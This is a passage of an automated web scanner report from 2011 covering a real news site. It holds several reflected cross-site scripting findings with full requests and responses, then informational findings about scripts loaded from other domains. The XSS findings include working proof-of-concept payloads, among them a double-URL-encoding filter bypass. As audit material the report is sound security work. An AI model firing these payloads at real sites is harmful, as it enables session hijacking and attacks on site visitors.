The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41499
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(389920a8ad2"><img src=a onerror=alert(1)>ccfe289fe13);"
class="article_tools_link">
...[SNIP]...

1.79. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3204c'><script>alert(1)</script>2fc187ef478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43866
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1'
class="article_tools_link">
...[SNIP]...

1.80. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f698a"><script>alert(1)</script>1a0a80d6daa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43871
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1')"
class="article_tools_link">
...[SNIP]...

2. Cross-domain script include  previous  next
There are 105 instances of this issue:


2.1. http://www.newsmax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 76862
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CMSPreferredCulture=en-US; expires=Mon, 19-Mar-2012 13:50:54 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0pfk0dqssxwuix45e50jl53z; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:50:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
<div class="demo unicorn_vertplayer_playlistdiv">
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...

2.2. http://www.newsmax.com/FastFeatures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45859
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.3. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45723
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.4. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46166
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.5. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45512
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.6. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.7. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45400
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.8. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46004
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.9. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.10. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45685
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.11. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63465
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.12. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920  previous  next

Summary

